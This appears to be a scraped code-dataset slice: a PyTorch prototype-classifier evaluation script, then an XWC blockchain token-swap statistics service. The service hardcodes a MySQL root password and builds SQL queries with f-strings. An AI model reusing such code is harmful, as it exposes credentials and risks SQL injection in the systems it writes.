inside root_path_train')\nparser.add_argument(\n '--root-path-test', type=str,\n default='../datasets/',\n help='root directory to test data')\nparser.add_argument(\n '--image-folder-test', type=str,\n default='ImageNet/',\n help='image directory inside root_path_test')\nparser.add_argument(\n '--subset-path', type=str,\n default=None,\n help='name of dataset to train on')\nparser.add_argument(\n '--val-split', type=str,\n default=None,\n help='name of split to evaluate on') \nparser.add_argument(\n '--log-file', type=str,\n default=None,\n help='path of file to which write logs to')\n\nlogging.basicConfig()\nlogger = logging.getLogger()\nlogger.setLevel(logging.INFO)\n\n_GLOBAL_SEED, NUM_CLASSES, REMAP_DICT = 0, 0, {}\nnp.random.seed(_GLOBAL_SEED)\ntorch.manual_seed(_GLOBAL_SEED)\ntorch.backends.cudnn.benchmark = True\n\npp = pprint.PrettyPrinter(indent=4)\n\n\ndef main(\n blocks,\n mask_frac,\n preload,\n pretrained,\n fname,\n subset_path,\n root_path_train,\n image_folder_train,\n root_path_test,\n image_folder_test,\n val_split=None,\n model_name=None,\n normalize=True,\n device_str='cuda:0'\n):\n device = torch.device(device_str)\n if 'cuda' in device_str:\n torch.cuda.set_device(device)\n\n # -- Define file names used to save computed embeddings (for efficient\n # -- reuse if running the script more than once)\n subset_tag = '-'.join(subset_path.split('/')).split('.txt')[0] if subset_path is not None \\\n else 'imagenet_subsets1-100percent'\n train_embs_path = os.path.join(pretrained, f'train-features-{subset_tag}-{fname}')\n # -- Save embeddings for each test dataset separately\n dataset_tag = '-'.join(image_folder_test.split('/'))[:-1]\n test_embs_path = os.path.join(pretrained, f'val-features-{dataset_tag}-{fname}')\n logger.info(train_embs_path)\n logger.info(test_embs_path)\n\n pretrained = os.path.join(pretrained, fname)\n\n # -- Function to make train/test dataloader\n def init_pipe(training):\n # -- make data transforms\n transform = transforms.Compose([\n transforms.Resize(size=256),\n transforms.CenterCrop(size=224),\n transforms.ToTensor(),\n transforms.Normalize(\n (0.485, 0.456, 0.406),\n (0.229, 0.224, 0.225))])\n # -- init data-loaders/samplers\n subset_file = subset_path if training else None\n root_path = root_path_train if training else root_path_test\n image_folder = image_folder_train if training else image_folder_test\n init_data = init_wilds_data if 'wilds' in root_path else init_inet_data \n data_loader, _ = init_data(\n transform=transform,\n batch_size=16,\n num_workers=0,\n world_size=1,\n rank=0,\n root_path=root_path,\n image_folder=image_folder,\n training=training,\n drop_last=False,\n subset_file=subset_file,\n val_split=val_split)\n return data_loader\n\n # -- Initialize the model\n encoder = init_model(\n device=device,\n pretrained=pretrained,\n model_name=model_name)\n encoder.eval()\n\n # -- If train embeddings already computed, load file, otherwise, compute\n # -- embeddings and save\n if preload and os.path.exists(train_embs_path):\n checkpoint = torch.load(train_embs_path, map_location='cpu')\n embs, labs = checkpoint['embs'], checkpoint['labs']\n logger.info(f'loaded embs of shape {embs.shape}')\n else:\n data_loader = init_pipe(True)\n embs, labs = make_embeddings(\n blocks=blocks,\n device=device,\n mask_frac=mask_frac,\n data_loader=data_loader,\n encoder=encoder)\n torch.save({\n 'embs': embs,\n 'labs': labs\n }, train_embs_path)\n logger.info(f'saved train embs of shape {embs.shape}')\n # -- Normalize embeddings\n cyan.preprocess(embs, 
normalize=normalize, columns=False, centering=True)\n\n # -- Get cluster embeddings and labels\n clr_embs, clr_labs = make_cluster_embs(embs, labs)\n # -- Evaluate and log\n train_top1, train_avg = calc_accs(embs, labs, clr_embs, clr_labs, None)\n # -- (save train top-1 and per-class avg. accs)\n logger.info(f'train top1: {train_top1}')\n logger.info(f'train avg: {train_avg}')\n\n # -- If test embeddings already computed, load file, otherwise, compute\n # -- embeddings and save\n if preload and os.path.exists(test_embs_path):\n checkpoint = torch.load(test_embs_path, map_location='cpu')\n test_embs, test_labs = checkpoint['embs'], checkpoint['labs']\n logger.info(f'loaded test embs of shape {test_embs.shape}')\n else:\n data_loader = init_pipe(False)\n test_embs, test_labs = make_embeddings(\n blocks=blocks,\n device=device,\n mask_frac=0.0,\n data_loader=data_loader,\n encoder=encoder)\n torch.save({\n 'embs': test_embs,\n 'labs': test_labs\n }, test_embs_path)\n logger.info(f'saved test embs of shape {test_embs.shape}')\n # -- Normalize embeddings\n cyan.preprocess(test_embs, normalize=normalize, columns=False, centering=True)\n\n # -- Evaluate and log\n try:\n val_projection_fn = getattr(data_loader, 'project_logits', None)\n except Exception:\n val_projection_fn = None\n test_top1, test_avg = calc_accs(test_embs, test_labs, clr_embs, clr_labs, val_projection_fn)\n # -- (save test top-1 and per-class avg. acc)\n logger.info(f'test top1: {test_top1}')\n logger.info(f'test avg: {test_avg}\\n\\n')\n\n return test_top1, test_avg\n\n\ndef make_embeddings(\n blocks,\n device,\n mask_frac,\n data_loader,\n encoder,\n epochs=1\n):\n ipe = len(data_loader)\n\n z_mem, l_mem = [], []\n\n for _ in range(epochs):\n for itr, data in enumerate(data_loader):\n imgs, labels = data[0].to(device), data[1].to(device)\n with torch.no_grad():\n z = encoder(imgs).cpu()\n labels = labels.cpu().tolist()\n z_mem.append(z)\n l_mem.extend(labels)\n if itr % 50 == 0:\n logger.info(f'[{itr}/{ipe}]')\n\n z_mem = torch.cat(z_mem, 0)\n # NOTE: potentailly remap labels because cyanure can't handle empty classes\n global NUM_CLASSES, REMAP_DICT\n if not len(REMAP_DICT):\n uniq_classes = sorted(list(set(l_mem)))\n REMAP_DICT = {uniq_classes[i]:i for i in range(len(uniq_classes))}\n NUM_CLASSES = len(REMAP_DICT)\n logger.info(f'No. 
of classes: {NUM_CLASSES}')\n l_mem = [REMAP_DICT[l_mem[i]] for i in range(len(l_mem))]\n l_mem = torch.tensor(l_mem)\n logger.info(z_mem.shape)\n logger.info(l_mem.shape)\n return z_mem, l_mem\n\n\n# -- Average embeddings for cluster prototypes\ndef make_cluster_embs(\n embs,\n labs,\n num_classes=1000\n):\n n, embs_dim = embs.shape\n clr_embs = torch.zeros(num_classes, embs_dim)\n lab_cnts = torch.zeros(num_classes)\n for i in range(n):\n lab = labs[i]\n lab_cnts[lab] += 1\n clr_embs[lab] += embs[i] \n # -- Remove fully zero prototypes\n clr_labs = torch.unique(torch.nonzero(clr_embs, as_tuple=True)[0])\n lab_cnts = lab_cnts[clr_labs]\n clr_embs = clr_embs[clr_labs]/lab_cnts.unsqueeze(-1)\n \n logger.info(clr_embs.shape)\n logger.info(clr_labs.shape)\n\n return clr_embs, clr_labs\n\n\n# -- Calculate top-1 and per-class avf acc based on L2-distance from prototypes\ndef calc_accs(embs, labs, clr_embs, clr_labs, val_projection_fn=None):\n global NUM_CLASSES\n l2_dist = torch.cdist(embs, clr_embs, p=2.0)\n _, min_idx = torch.min(l2_dist, dim=-1)\n pred_labs = clr_labs[min_idx]\n\n if val_projection_fn:\n onehot = torch.zeros(pred_labs.shape[0], NUM_CLASSES)\n onehot[np.arange(pred_labs.shape[0]), pred_labs] = 1\n onehot = val_projection_fn(onehot, 'cpu')\n NUM_CLASSES = onehot.shape[1]\n pred_labs = onehot.argmax(axis=1)\n\n correct = torch.sum(torch.eq(pred_labs, labs))\n top1_acc = 100. * correct / labs.shape[0]\n\n conf_mat = torch.zeros(NUM_CLASSES, NUM_CLASSES)\n for l, p in zip(labs, pred_labs): conf_mat[l, p] += 1\n tot_per_cls, corr_per_cls = conf_mat.sum(axis=1), conf_mat.diagonal()\n per_cls_acc = corr_per_cls[tot_per_cls != 0] / tot_per_cls[tot_per_cls != 0]\n avg_acc = 100. * per_cls_acc.mean()\n\n return top1_acc, avg_acc\n\n\ndef init_model(\n device,\n pretrained,\n model_name,\n):\n if 'deit' in model_name:\n encoder = deit.__dict__[model_name]()\n encoder.fc = None\n encoder.norm = None\n elif 'resnet' in model_name:\n encoder = resnet_models.__dict__[model_name](output_dim=0, eval_mode=False)\n elif 'clip' in model_name:\n if 'vitb16' in model_name:\n encoder = VisionTransformer(input_resolution=224, patch_size=16, \\\n width=768, layers=12, heads=12, output_dim=512)\n elif 'rn50' in model_name:\n encoder = ModifiedResNet(input_resolution=224, layers=(3, 4, 6, 3), \\\n heads=32, width=64, output_dim=1024)\n else:\n raise Exception(f\"Model {model_name} is not supported.\")\n exit(0)\n\n encoder.to(device)\n encoder, _ = load_pretrained(r_path=pretrained, encoder=encoder, model_name=model_name)\n\n return encoder\n\n\nif __name__ == '__main__':\n \"\"\"'main' for launching script using params read from command line\"\"\"\n global args\n args = parser.parse_args()\n pp.pprint(args)\n # TODO -- write full length logs\n if args.log_file is not None:\n os.makedirs(os.path.dirname(args.log_file), exist_ok=True)\n logger.addHandler(logging.FileHandler(args.log_file, mode='w'))\n main(\n blocks=1,\n mask_frac=args.mask,\n preload=args.preload,\n pretrained=args.pretrained,\n fname=args.fname,\n subset_path=args.subset_path,\n root_path_train=args.root_path_train,\n image_folder_train=args.image_folder_train,\n root_path_test=args.root_path_test,\n image_folder_test=args.image_folder_test,\n val_split=args.val_split, \n model_name=args.model_name,\n normalize=args.normalize,\n device_str=args.device\n 
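        # Aside: calc_accs above performs nearest-prototype classification;
        # its core reduces to three lines (illustrative only):
        #     d = torch.cdist(embs, clr_embs, p=2.0)  # (N, C) L2 distances
        #     pred = clr_labs[d.argmin(dim=-1)]       # closest prototype
        #     top1 = (pred == labs).float().mean()    # fraction correct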
)","repo_name":"Aaditya-Singh/Low-Shot-Robustness","sub_path":"protonet_eval.py","file_name":"protonet_eval.py","file_ext":"py","file_size_in_byte":11857,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"52"} +{"seq_id":"33959282295","text":"#coding=utf-8\n\nimport json\nimport time\nimport datetime\nimport pymysql\nfrom sqlalchemy import func\nfrom libs.xwc_api import XWC\nfrom libs.xt_api import Api\nfrom libs import session\nfrom libs.models import StSwapTick, BlTxEvents, BlBlock, StSwapStat\nfrom libs.models import StSwapLiquidity\n\n\nclass TokenSwapStat:\n def __init__(self, xwc_api, xt_api):\n self._xwc_api = xwc_api\n self._xt_api = xt_api\n self.pairs = {\n 'xwc_eth': 'XWCCJV5jJ8acWx3AfVPUT6x1K2hXRkptZ8hGB',\n 'xwc_cusd': 'XWCCarrfVrHCRupUbJfasasx2Rdy4Aor8eTD9',\n 'xwc_tp': 'XWCCcUF3uQDHzyhAuKsZ9DtFyVBcFuousjR6w'\n }\n self.pairsReverse = {\n 'XWCCJV5jJ8acWx3AfVPUT6x1K2hXRkptZ8hGB': 'xwc_eth',\n 'XWCCarrfVrHCRupUbJfasasx2Rdy4Aor8eTD9': 'xwc_cusd',\n 'XWCCcUF3uQDHzyhAuKsZ9DtFyVBcFuousjR6w': 'xwc_tp'\n }\n self.id2AssetName = {'1.3.0': 'XWC', '1.3.3': 'ETH'}\n self.last1HourBlock = 0\n self.last24HourBlock = 0\n self.firstTpBlock = 5003249\n self.perBlockTp = 0.06944444\n\n def addr2Token(self, address):\n addrTokenMap = {\n 'XWCCUXT5Dr5EdYtoHBkCsTqSUUEpNd5uf22Db': 'TP',\n 'XWCCc55NYwUDeQyy2Co5hqdFt75wWUrMu71rW': 'CUSD',\n 'XWC': 'XWC',\n 'ETH': 'ETH'\n }\n return addrTokenMap[address]\n\n def token2Addr(self, token):\n tokenAddrMap = {\n 'TP': 'XWCCUXT5Dr5EdYtoHBkCsTqSUUEpNd5uf22Db',\n 'CUSD': 'XWCCc55NYwUDeQyy2Co5hqdFt75wWUrMu71rW',\n 'XWC': 'XWC',\n 'ETH': 'ETH'\n }\n return tokenAddrMap[token]\n\n def _getMatchedBlock(self, startBlock, endBlock, startTime):\n blockNumber = startBlock\n while blockNumber < endBlock:\n block = self._xwc_api.get_block(blockNumber)\n blockTime = int(time.mktime(time.strptime(block['timestamp'], \"%Y-%m-%dT%H:%M:%S\")))\n if startTime < blockTime:\n return blockNumber - 1\n blockNumber += 1\n return 0\n\n def _getBatch2Reward(self, startBlock, endBlock, totalReward):\n perWeekBlock = 7 * 24 * 600\n weekBlocks = [[5360500+perWeekBlock*i, totalReward/16*(2-i)*5/perWeekBlock] for i in range(3)]\n weekBlocks[2][1] = totalReward/16/perWeekBlock\n reward = 0\n\n for b in weekBlocks:\n if startBlock > b[0]+perWeekBlock or endBlock < b[0]:\n continue\n if startBlock >= b[0]:\n segStart = startBlock\n else:\n segStart = b[0]\n if endBlock >= b[0]+perWeekBlock:\n segEnd = b[0]+perWeekBlock\n else:\n segEnd = endBlock\n reward += (segEnd-segStart) * b[1]\n return reward\n\n def tpStat(self, address):\n currentHeight = self._xwc_api.get_block_height()\n currentTime = int(time.time()) - 28800 # convert to UTC timestamp\n #block = self._xwc_api.get_block(5190601)\n #blockTime = int(time.mktime(time.strptime(block['timestamp'], \"%Y-%m-%dT%H:%M:%S\")))\n #print(blockTime)\n #print(currentTime-blockTime)\n #return\n temp24HourHeight = self.last24HourBlock if self.last24HourBlock > 0 else currentHeight - 14400\n temp1HourHeight = self.last1HourBlock if self.last1HourBlock > 0 else currentHeight - 600\n self.last24HourBlock = self._getMatchedBlock(temp24HourHeight, currentHeight, currentTime-86400)\n self.last1HourBlock = self._getMatchedBlock(temp1HourHeight, currentHeight, currentTime-3600)\n tpStat = {}\n if self.last24HourBlock > 0 and self.last1HourBlock > 0:\n if address == 'XWCCJV5jJ8acWx3AfVPUT6x1K2hXRkptZ8hGB':\n tpStat['tp1Hour'] = (currentHeight - self.last1HourBlock) * self.perBlockTp\n tpStat['tp24Hour'] = 
(currentHeight - self.last24HourBlock) * self.perBlockTp\n tpStat['tpSupply'] = (currentHeight - self.firstTpBlock) * self.perBlockTp\n if tpStat['tpSupply'] > 30000:\n tpStat['tpSupply'] = 30000\n tpStat['tp1Hour'] = 0\n tpStat['tp24Hour'] = 0\n elif address == 'XWCCarrfVrHCRupUbJfasasx2Rdy4Aor8eTD9':\n tpStat['tp1Hour'] = self._getBatch2Reward(self.last1HourBlock, currentHeight, 20000)\n tpStat['tp24Hour'] = self._getBatch2Reward(self.last24HourBlock, currentHeight, 20000)\n tpStat['tpSupply'] = self._getBatch2Reward(5360500, currentHeight, 20000)\n if tpStat['tpSupply'] > 20000:\n tpStat['tpSupply'] = 20000\n tpStat['tp1Hour'] = 0\n tpStat['tp24Hour'] = 0\n elif address == 'XWCCcUF3uQDHzyhAuKsZ9DtFyVBcFuousjR6w':\n tpStat['tp1Hour'] = self._getBatch2Reward(self.last1HourBlock, currentHeight, 50000)\n tpStat['tp24Hour'] = self._getBatch2Reward(self.last24HourBlock, currentHeight, 50000)\n tpStat['tpSupply'] = self._getBatch2Reward(5360500, currentHeight, 50000)\n if tpStat['tpSupply'] > 50000:\n tpStat['tpSupply'] = 50000\n tpStat['tp1Hour'] = 0\n tpStat['tp24Hour'] = 0\n return tpStat\n\n def swapStat(self, address, token1, token2):\n data = {\n #'fee': { token2: 0, token1: 0 },\n 'rate1Day': { token2: 0, token1:0 },\n 'pool': { token2: 0, token1: 0 },\n 'price': { token2: 0, token1: 0 }\n }\n ticker = self._xt_api.get_ticker(f'{token1.lower()}_usdt')\n data['rate1Day'][token1] = f\"{ticker['rate']}\"\n data['price'][token1] = ticker['price']\n if token2 != 'CUSD':\n ticker = self._xt_api.get_ticker(f'{token2.lower()}_usdt')\n data['rate1Day'][token2] = f\"{ticker['rate']}\"\n data['price'][token2] = ticker['price']\n else:\n data['rate1Day'][token2] = 0\n data['price'][token2] = 1\n info = self._xwc_api.get_depth(f'{token1.lower()}_{token2.lower()}')\n if info is None:\n return\n print(info['token_1_contractAddr'], token1, self.addr2Token(info['token_1_contractAddr']))\n if info['token_1_contractAddr'] == token1 or token1 == self.addr2Token(info['token_1_contractAddr']):\n data['pool'][token1] = f\"{info['token_1_pool_amount']/10**8:>.4f}\"\n data['pool'][token2] = f\"{info['token_2_pool_amount']/10**8:>.4f}\"\n else:\n data['pool'][token2] = f\"{info['token_1_pool_amount']/10**8:>.4f}\"\n data['pool'][token1] = f\"{info['token_2_pool_amount']/10**8:>.4f}\"\n print(f\"{token2}: {info['token_1_pool_amount']/10**8:>.4f}, {token1}: {info['token_2_pool_amount']/10**8:>.4f}\")\n \n db = pymysql.connect(host=\"192.168.0.209\",\n user=\"root\",\n password=\"12PV1Kjlh\",\n port=3306,\n database=\"xwc_explorer\",\n charset='utf8')\n cursor = db.cursor()\n try:\n cursor.execute(\"select min(block_num) from bl_block where block_time > date_sub(now(), interval 1 DAY)\")\n results = cursor.fetchall()\n block1Day = results[0][0]\n cursor.execute(\"select min(block_num) from bl_block where block_time > date_sub(now(), interval 7 DAY)\")\n results = cursor.fetchall()\n block7Day = results[0][0]\n cursor.execute(f\"select count(*) from bl_tx_events where contract_address = '{address}' and event_name='Exchanged' and block_num < {block1Day}\")\n results = cursor.fetchall()\n txCountBefore24 = results[0][0]\n except:\n return\n txCount = 0\n # all days\n try:\n exData = {'exchange': {token2: 0, token1: 0}, 'fee': {token2: 0, token1: 0}}\n ex1DayData = {'exchange': {token2: 0, token1: 0}, 'fee': {token2: 0, token1: 0}}\n ex7DaysData = {'exchange': {token2: 0, token1: 0}, 'fee': {token2: 0, token1: 0}}\n cursor.execute(f\"select event_arg,block_num from bl_tx_events where contract_address = '{address}' and 
event_name='Exchanged'\")\n results = cursor.fetchall()\n for row in results:\n txCount += 1\n exchange = json.loads(row[0])\n exchange['buy_asset'] = self.addr2Token(exchange['buy_asset'])\n exchange['sell_asset'] = self.addr2Token(exchange['sell_asset'])\n exData['fee'][exchange['sell_asset']] += exchange['fee']\n exData['exchange'][exchange['buy_asset']] += exchange['buy_amount']\n exData['exchange'][exchange['sell_asset']] += exchange['sell_amount']\n if row[1] > block1Day:\n ex1DayData['fee'][exchange['sell_asset']] += exchange['fee']\n ex1DayData['exchange'][exchange['buy_asset']] += exchange['buy_amount']\n ex1DayData['exchange'][exchange['sell_asset']] += exchange['sell_amount']\n if row[1] > block7Day:\n ex7DaysData['fee'][exchange['sell_asset']] += exchange['fee']\n ex7DaysData['exchange'][exchange['buy_asset']] += exchange['buy_amount']\n ex7DaysData['exchange'][exchange['sell_asset']] += exchange['sell_amount']\n exData['exchange'][token2] = f\"{exData['exchange'][token2]/10**8:>.4f}\"\n exData['exchange'][token1] = f\"{exData['exchange'][token1]/10**8:>.4f}\"\n exData['fee'][token2] = f\"{exData['fee'][token2]/10**8:>.4f}\"\n exData['fee'][token1] = f\"{exData['fee'][token1]/10**8:>.4f}\"\n ex1DayData['exchange'][token2] = f\"{ex1DayData['exchange'][token2]/10**8:>.4f}\"\n ex1DayData['exchange'][token1] = f\"{ex1DayData['exchange'][token1]/10**8:>.4f}\"\n ex1DayData['fee'][token2] = f\"{ex1DayData['fee'][token2]/10**8:>.4f}\"\n ex1DayData['fee'][token1] = f\"{ex1DayData['fee'][token1]/10**8:>.4f}\"\n ex7DaysData['exchange'][token2] = f\"{ex7DaysData['exchange'][token2]/10**8:>.4f}\"\n ex7DaysData['exchange'][token1] = f\"{ex7DaysData['exchange'][token1]/10**8:>.4f}\"\n ex7DaysData['fee'][token2] = f\"{ex7DaysData['fee'][token2]/10**8:>.4f}\"\n ex7DaysData['fee'][token1] = f\"{ex7DaysData['fee'][token1]/10**8:>.4f}\"\n data['allDay'] = exData\n data['1day'] = ex1DayData\n data['7day'] = ex7DaysData\n except Exception as e:\n print(str(e))\n pass\n data['txCount'] = txCount\n data['txCountBefore24'] = txCountBefore24\n data['tpStat'] = self.tpStat(address)\n print(json.dumps(data))\n return data\n\n def _updateSinglePair(self, address, start_block_num, ex_pair):\n precision = 10 ** 8\n try:\n #cursor.execute(f\"select event_arg,block_num from bl_tx_events where contract_address = '{address}' and event_name='Exchanged' and block_num > {start_block_num}\")\n #results = cursor.fetchall()\n results = session.query(BlTxEvents.event_arg,BlTxEvents.block_num). 
\\\n filter(\n BlTxEvents.contract_address==address,\n BlTxEvents.event_name=='Exchanged',\n BlTxEvents.block_num>start_block_num).\\\n all()\n lastBlockTime = 0\n lastBlockNum = 0\n for r in results:\n exchange = json.loads(r[0])\n exchange['buy_asset'] = self.addr2Token(exchange['buy_asset'])\n exchange['sell_asset'] = self.addr2Token(exchange['sell_asset'])\n if exchange['buy_asset'] == 'XWC':\n price = exchange['sell_amount'] / exchange['buy_amount']\n volume = exchange['buy_amount'] / precision\n elif exchange['sell_asset'] == 'XWC':\n price = exchange['buy_amount'] / exchange['sell_amount']\n volume = exchange['sell_amount'] / precision\n else:\n price = 0\n volume = 0\n exchange['buy_amount'] = exchange['buy_amount'] / precision\n exchange['sell_amount'] = exchange['sell_amount'] / precision\n exchange['fee'] = exchange['fee'] / precision\n if lastBlockNum == 0 or lastBlockNum != r[1]:\n block = session.query(BlBlock.block_time).filter(BlBlock.block_num==r[1]).first()\n lastBlockNum = r[1]\n lastBlockTime = block.block_time\n session.add(StSwapTick(\n timestamp=lastBlockTime,\n ex_pair=ex_pair,\n buy_asset=exchange['buy_asset'],\n sell_asset=exchange['sell_asset'],\n buy_amount=exchange['buy_amount'],\n sell_amount=exchange['sell_amount'],\n fee=exchange['fee'],\n block_num=lastBlockNum,\n price=price,\n volume=volume\n ))\n except Exception as e:\n print(str(e))\n return\n \n\n def updateTick(self):\n last_tick = session.query(func.max(StSwapTick.block_num).label('block_num')).first()\n if last_tick.block_num is None:\n print(\"first time\")\n start_block_num = 4992608\n else:\n start_block_num = int(last_tick.block_num)\n print(f'update tick - start block: {start_block_num}')\n for k, v in self.pairs.items():\n self._updateSinglePair(v, start_block_num, k)\n session.commit()\n print('tick updated')\n\n def updateKline(self):\n from libs.models import StSwapKdata1Min, StSwapKdata5Min, StSwapKdata15Min, \\\n StSwapKdata30Min, StSwapKdataDaily, StSwapKdata6Hour, StSwapKdataWeekly, \\\n StSwapKdata1Hour, StSwapKdata2Hour, StSwapKdata12Hour, \\\n StSwapKdataMonthly\n from libs.k_line_obj import KLine1MinObj, KLine5MinObj, KLine15MinObj, KLine30MinObj, KLine1HourObj, KLine2HourObj, \\\n KLine6HourObj, KLine12HourObj, KLineWeeklyObj, KLineDailyObj, KLineMonthlyObj\n def process_kline_common(base_table, target_table, process_obj, pair):\n #print(\"base: %s, target: %s, pair: %s\" % (str(base_table), str(target_table), pair))\n k_last = session.query(target_table).filter(target_table.ex_pair==pair).order_by(target_table.timestamp.desc()).limit(1).first()\n k = process_obj(k_last)\n if k_last is None:\n # if str(base_table) == \"\":\n last_time = datetime.datetime.utcnow() - datetime.timedelta(days=365)\n else:\n last_time = k_last.timestamp\n #print(\"last time: %s\" % (last_time))\n ticks = session.query(base_table).filter(base_table.ex_pair==pair, base_table.timestamp>=last_time).order_by(base_table.id).all()\n for t in ticks:\n k.process_tick(t)\n for r in k.get_k_data():\n if k_last is not None and k_last.timestamp == r['start_time']:\n session.query(target_table).filter_by(timestamp=k_last.timestamp, ex_pair=pair).delete()\n session.add(target_table(ex_pair=pair, k_open=r['k_open'], k_close=r['k_close'], \\\n k_high=r['k_high'], k_low=r['k_low'], timestamp=r['start_time'], \\\n block_num=r['block_num'], volume=r['volume']))\n\n for p in self.pairs.keys():\n # Process 1-minute K-Line\n process_kline_common(StSwapTick, StSwapKdata1Min, KLine1MinObj, p)\n # Process 5-minutes K-Line\n 
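            # Aside: each call below rebuilds coarser candles from finer
            # ones (1min -> 5/15/30min -> 1h -> ... -> monthly). One hop in
            # plain pandas, assuming a timestamp-indexed tick frame with
            # 'price' and 'volume' columns (illustrative only):
            #     ohlc = ticks["price"].resample("5min").ohlc()
            #     ohlc["volume"] = ticks["volume"].resample("5min").sum()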
process_kline_common(StSwapKdata1Min, StSwapKdata5Min, KLine5MinObj, p)\n # Process 15-minutes K-Line\n process_kline_common(StSwapKdata1Min, StSwapKdata15Min, KLine15MinObj, p)\n # Process 30-minutes K-Line\n process_kline_common(StSwapKdata1Min, StSwapKdata30Min, KLine30MinObj, p)\n # Process 1-hour K-Line\n process_kline_common(StSwapKdata1Min, StSwapKdata1Hour, KLine1HourObj, p)\n # Process 2-hour K-Line\n process_kline_common(StSwapKdata1Hour, StSwapKdata2Hour, KLine2HourObj, p)\n # Process 6-hour K-Line\n process_kline_common(StSwapKdata1Hour, StSwapKdata6Hour, KLine6HourObj, p)\n # Process 12-hour K-Line\n process_kline_common(StSwapKdata1Hour, StSwapKdata12Hour, KLine12HourObj, p)\n # Process daily K-Line\n process_kline_common(StSwapKdata1Hour, StSwapKdataDaily, KLineDailyObj, p)\n # Process weekly K-Line\n process_kline_common(StSwapKdata1Hour, StSwapKdataWeekly, KLineWeeklyObj, p)\n # Process monthly K-Line\n process_kline_common(StSwapKdataDaily, StSwapKdataMonthly, KLineMonthlyObj, p)\n session.commit()\n\n def _updateSinglePairLiqiuidy(self, startBlock, pair, contract, lastBlock):\n tokens = pair.split('_')\n tokens[0] = tokens[0].upper()\n tokens[1] = tokens[1].upper()\n #events = session.query(BlTxEvents.event_name,BlTxEvents.event_arg,BlTxEvents.block_num,BlBlock.block_time).\\\n #join(BlBlock, BlBlock.block_num==BlTxEvents.block_num).\\\n #filter(\\\n #BlTxEvents.block_num>startBlock,\n #BlTxEvents.event_name.in_(('Exchanged','LiquidityAdded','LiquidityRemoved')),\n #BlTxEvents.contract_address==contract).\\\n #order_by(BlTxEvents.block_num).all()\n lastRecord = session.query(StSwapLiquidity).filter(\n StSwapLiquidity.tp_name==pair).order_by(StSwapLiquidity.stat_time.desc()).first()\n currentRecord = {\n 'stat_time': 0,\n 'token1_amount': 0,\n 'token2_amount': 0,\n 'block_num': 0\n }\n if lastRecord is not None:\n currentRecord['stat_time'] = lastRecord.stat_time\n currentRecord['token1_amount'] = lastRecord.token1_amount\n currentRecord['token2_amount'] = lastRecord.token2_amount\n today = datetime.date.today()\n today = datetime.datetime(today.year, today.month, today.day)\n if currentRecord['stat_time'] != today:\n currentRecord['stat_time'] = today\n events = self._xwc_api.get_contract_events(contract, startBlock, lastBlock-startBlock)\n for e in events:\n if currentRecord['block_num'] != e['block_num']:\n currentRecord['block_num'] = e['block_num']\n block = session.query(BlBlock.block_time).filter(BlBlock.block_num==e['block_num']).first()\n blockTime = block[0]\n blockDay = datetime.datetime(blockTime.year, blockTime.month, blockTime.day)\n if currentRecord['stat_time'] == 0:\n currentRecord['stat_time'] = blockDay\n elif currentRecord['stat_time'] != blockDay and currentRecord['token1_amount'] > 0 and currentRecord['token2_amount'] > 0:\n # TODO, commit record and reset currentRecord\n session.query(StSwapLiquidity).filter(StSwapLiquidity.tp_name==pair,StSwapLiquidity.stat_time==currentRecord['stat_time']).delete()\n session.add(StSwapLiquidity(\n tp_name=pair,\n token1_name=tokens[0],\n token2_name=tokens[1],\n token1_amount=currentRecord['token1_amount'],\n token2_amount=currentRecord['token2_amount'],\n stat_time=currentRecord['stat_time']\n ))\n currentRecord['stat_time'] = blockDay\n if e['event_name'] == 'LiquidityAdded':\n liquidityChange = json.loads(e['event_arg'])\n currentRecord['token1_amount'] += int(liquidityChange[self.token2Addr(tokens[0])])\n currentRecord['token2_amount'] += int(liquidityChange[self.token2Addr(tokens[1])])\n elif e['event_name'] 
== 'LiquidityRemoved':\n liquidityChange = json.loads(e['event_arg'])\n currentRecord['token1_amount'] -= int(liquidityChange[self.token2Addr(tokens[0])])\n currentRecord['token2_amount'] -= int(liquidityChange[self.token2Addr(tokens[1])])\n elif e['event_name'] == 'Exchanged':\n liquidityChange = json.loads(e['event_arg'])\n liquidityChange['buy_asset'] = self.addr2Token(liquidityChange['buy_asset'])\n if tokens[0] == liquidityChange['buy_asset']:\n currentRecord['token1_amount'] -= int(liquidityChange['buy_amount'])\n currentRecord['token2_amount'] += int(liquidityChange['sell_amount'])\n else:\n currentRecord['token2_amount'] -= int(liquidityChange['buy_amount'])\n currentRecord['token1_amount'] += int(liquidityChange['sell_amount'])\n else:\n continue\n if currentRecord['token1_amount'] > 0 and currentRecord['token2_amount'] > 0:\n session.query(StSwapLiquidity).filter(StSwapLiquidity.tp_name==pair,StSwapLiquidity.stat_time==currentRecord['stat_time']).delete()\n session.add(StSwapLiquidity(\n tp_name=pair,\n token1_name=tokens[0],\n token2_name=tokens[1],\n token1_amount=currentRecord['token1_amount'],\n token2_amount=currentRecord['token2_amount'],\n stat_time=currentRecord['stat_time']\n ))\n\n def updateLiquidity(self):\n lastBlock = 4953249\n lastBlockRecord = session.query(StSwapStat.swap_value).filter(StSwapStat.swap_stat=='liquidity_scan_block').first()\n if lastBlockRecord is not None:\n blockNum = int(lastBlockRecord[0])\n if blockNum > lastBlock:\n lastBlock = blockNum\n currentBlock = self._xwc_api.get_block_height()\n for p, c in self.pairs.items():\n self._updateSinglePairLiqiuidy(lastBlock, p, c, currentBlock)\n session.query(StSwapStat).filter(StSwapStat.swap_stat=='liquidity_scan_block').delete()\n session.add(StSwapStat(\n swap_stat='liquidity_scan_block',\n swap_value=currentBlock\n ))\n session.commit()\n print('updateLiquidity committed')\n \n\n def stat(self):\n data = {}\n for k, v in self.pairs.items():\n pairs = k.split('_')\n data[k] = self.swapStat(v, pairs[0].upper(), pairs[1].upper())\n json.dump(data, open('/var/www/html/tokenswap_stat.json', 'w'))\n #json.dump(data, open('tokenswap_stat.json', 'w'))\n\n\nif __name__ == '__main__':\n xwc_api = XWC('http://localhost:10044/api', 'caller0')\n xt_api = Api(\"\", \"\")\n statObj = TokenSwapStat(xwc_api, xt_api)\n while True:\n try:\n statObj.stat()\n statObj.updateTick()\n statObj.updateKline()\n statObj.updateLiquidity()\n except Exception as e:\n print(str(e))\n time.sleep(6)\n #statObj.tpStat()\n","repo_name":"realm520/tp_swap_stat","sub_path":"stat.py","file_name":"stat.py","file_ext":"py","file_size_in_byte":23321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"13901743746","text":"import numpy as np\r\nimport torch\r\n\r\ndef precision_difF(lbls, pred_lbls):\r\n pred_lbls = pred_lbls.squeeze(1)\r\n assert (lbls.shape == 